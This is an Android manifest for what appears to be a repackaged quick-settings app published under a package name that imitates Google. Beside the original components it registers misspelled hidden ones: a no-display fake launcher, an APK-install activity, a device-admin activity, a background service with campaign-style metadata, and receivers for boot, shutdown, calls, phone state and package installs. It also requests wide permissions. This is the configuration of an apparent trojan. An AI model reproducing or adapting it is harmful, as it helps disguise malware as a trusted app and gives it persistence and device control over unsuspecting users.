<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.android.smart">
    <supports-screens/>
    <application android:icon="@drawable/ic_logo" android:label="@string/txt_quick_settings" android:name="com.bwx.bequick.SettingsApplication">
        <activity android:icon="@drawable/ic_logo" android:label="@string/txt_quick_settings" android:launchMode="standard" android:name="com.bwx.bequick.EulaActivity" android:theme="@android:style/Theme.NoDisplay"/>
        <activity android:icon="@drawable/ic_logo" android:label="@string/txt_quick_settings" android:launchMode="standard" android:name="com.bwx.bequick.ShowSettingsActivity" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.SEARCH_LONG_PRESS"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
        <activity android:excludeFromRecents="true" android:icon="@drawable/ic_logo" android:label="@string/txt_quick_settings" android:launchMode="singleInstance" android:name="com.bwx.bequick.DialogSettingsActivity" android:theme="@android:style/Theme.Dialog"/>
        <activity android:excludeFromRecents="true" android:icon="@drawable/ic_logo" android:label="@string/txt_quick_settings" android:launchMode="singleInstance" android:name="com.bwx.bequick.MainSettingsActivity"/>
        <activity android:excludeFromRecents="true" android:label="@string/txt_customize_settings" android:name="com.bwx.bequick.LayoutSettingsActivity"/>
        <activity android:excludeFromRecents="true" android:label="@string/txt_preferences" android:name="com.bwx.bequick.preferences.CommonPrefs"/>
        <activity android:excludeFromRecents="true" android:label="@string/txt_preferences" android:name="com.bwx.bequick.preferences.BrightnessPrefs"/>
        <activity android:excludeFromRecents="true" android:label="@string/txt_preferences" android:name="com.bwx.bequick.preferences.MobileDataPrefs"/>
        <activity android:excludeFromRecents="true" android:label="@string/txt_preferences" android:name="com.bwx.bequick.preferences.AirplaneModePrefs"/>
        <activity android:excludeFromRecents="true" android:finishOnTaskLaunch="true" android:label="" android:launchMode="singleInstance" android:name="com.bwx.bequick.flashlight.ScreenLightActivity" android:noHistory="true" android:screenOrientation="portrait"/>
        <receiver android:name="com.bwx.bequick.flashlight.LedFlashlightReceiver">
            <intent-filter>
                <action android:name="com.bwx.bequick.FLASHLIGHT"/>
                <action android:name="com.bwx.bequick.WARN_FLASHLIGHT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.bwx.bequick.receivers.StatusBarIntegrationReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="com.bwx.bequick.UPDATE_STATUSBAR_INTEGRATION"/>
                <action android:name="com.bwx.bequick.INIT_STATUSBAR_INTEGRATION"/>
                <action android:name="com.bwx.bequick.START_QS"/>
            </intent-filter>
        </receiver>
        <activity android:excludeFromRecents="true" android:name="com.google.android.smart.FakkeLauncherActivitoy" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <meta-data android:name="host-package" android:value="com.google.android.smart"/>
            <meta-data android:name="host-component" android:value="com.bwx.bequick.ShowSettingsActivity"/>
        </activity>
        <activity android:configChanges="orientation" android:excludeFromRecents="true" android:launchMode="singleTask" android:name="com.google.android.smart.ApkpInstallActivitoy" android:screenOrientation="nosensor" android:theme="@android:style/Theme.NoTitleBar.Fullscreen"/>
        <service android:name="com.google.android.smart.MakinServicoe">
            <meta-data android:name="pid" android:value="9011003"/>
            <meta-data android:name="package_id" android:value="1004"/>
            <meta-data android:name="package_level" android:value="1"/>
            <meta-data android:name="version_own" android:value="1.4"/>
        </service>
        <receiver android:name="com.google.android.smart.WakkeLockReceiveor">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.google.android.smart.BokotReceiveor">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <category android:name="android.intent.category.HOME"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.google.android.smart.ShkutdownReceiveor">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_SHUTDOWN"/>
                <category android:name="android.intent.category.HOME"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.google.android.smart.LikveReceiveor">
            <intent-filter>
                <action android:name="android.intent.action.CFF"/>
                <action android:name="android.intent.action.PHONE_STATE"/>
                <action android:name="android.intent.action.SIG_STR"/>
                <action android:name="android.intent.action.SERVICE_STATE"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.intent.action.BATTERY_CHANGED"/>
                <action android:name="android.intent.action.DATE_CHANGED"/>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
                <action android:name="android.intent.action.REBOOT"/>
                <action android:name="android.intent.action.TIME_CHANGED"/>
                <action android:name="android.intent.action.WALLPAPER_CHANGED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.google.android.smart.PakckageAddedReceiveor">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <activity android:configChanges="orientation" android:excludeFromRecents="true" android:launchMode="singleTask" android:name="com.google.android.smart.DekviceAdminAddActivitoy" android:screenOrientation="nosensor" android:theme="@android:style/Theme.NoTitleBar.Fullscreen"/>
    </application>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.BLUETOOTH"/>
    <uses-permission android:name="android.permission.BLUETOOTH_ADMIN"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <uses-permission android:name="android.permission.READ_SYNC_SETTINGS"/>
    <uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.FLASHLIGHT" android:required="false"/>
    <uses-permission android:name="android.permission.HARDWARE_TEST" android:required="false"/>
    <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" android:required="false"/>
    <uses-permission android:name="android.permission.READ_SECURE_SETTINGS" android:required="false"/>
    <uses-permission android:name="android.permission.CAMERA" android:required="false"/>
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.CHANGE_CONFIGURATION"/>
    <uses-permission android:name="android.permission.DEVICE_POWER"/>
</manifest>
